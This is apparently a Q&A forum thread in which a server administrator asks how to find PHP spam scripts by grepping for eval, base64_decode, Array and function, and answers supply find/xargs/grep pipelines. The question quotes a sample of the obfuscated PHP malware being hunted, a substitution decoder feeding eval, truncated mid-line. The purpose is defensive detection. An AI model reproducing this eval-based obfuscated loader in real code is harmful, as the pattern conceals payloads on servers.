# Find php files with 4 patterns

Tags: php, linux, grep, centos, find

I need to find php scripts that have exact same 4 patterns on linux servers.

The files need to have the 4 patterns/words and not only one or two...

Patterns:

- eval
- base64_decode
- Array
- function

I need this to find encoded SPAM scripts.

I already tried with find but I dont know how to match the exact 4 patterns

Like this:

```
<?php
function isanrl($nhfxslsmo, $rrkiu){$m = ''; for($i=0; $i < strlen($nhfxslsmo); $i++){$m .= isset($rrkiu[$nhfxslsmo[$i]]) ? $rrkiu[$nhfxslsmo[$i]] : $nhfxslsmo[$i];}
$dbklusmzx="base64_decode";return $dbklusmzx($m);}
$mpvqrt = 'XLgWYavbkPXhdna5ruv5PnoVk5rNSZea4Z1FK1FIYpeFPqBgx8f76Lv7Pna5ruv5r5rNSsIFK1F'.
'IYpeFPqBgx8f76pi9Pna9kpB2xLgV6gv3Yp2gd51fm8DG8DzbkPRJxLg0kavNYp2Fx8f1C'.
'4NC8uguCLgbrna3C8RJU3awaDawCwDCT1hddiv4RadpRad6d2zSUiv4RUoLd23fHwIMA5SGSIhddiv4R'.
'C8wR5kPB6S7SMPaNMjMdxSs3fdLdEksNC8PdgxQa56MzMjPBgBcRJkpec6nRgCQBgrugE6LgtkwfDruabCwDG873'.
'=';
$qqkghzt = Array('1'=>'w', '0'=>'t', '3'=>'0', '2'=>'1', '5'=>'y', '4'=>'T', '7'=>'n', '6'=>'b', '9'=>'4', '8'=>'C', 'A'=>'L', 'C'=>'K', 'B'=>'N', 'E'=>'h', 'D'=>'k$
eval(isanrl($mpvqrt, $qqkghzt));?>
```

Comment: Go to the code base root and try `grep 'eval' -r . | grep 'base64_decode' | grep 'Array' | grep 'function'`. I think that'll list your files with all 4.

Answer (score 0):

This will list all the .php files in the current directory (including subdirectories) that contain all four patterns (assuming no spaces or funny characters in filenames):

```
find * -name "*.php" -print0 |
  xargs grep -Zl eval |
  xargs grep -Zl base64_decode |
  xargs grep -Zl Array |
  xargs grep -l function
```

(The `find -print0` and `grep -Z` options are for handling any paths with spaces or funny characters.)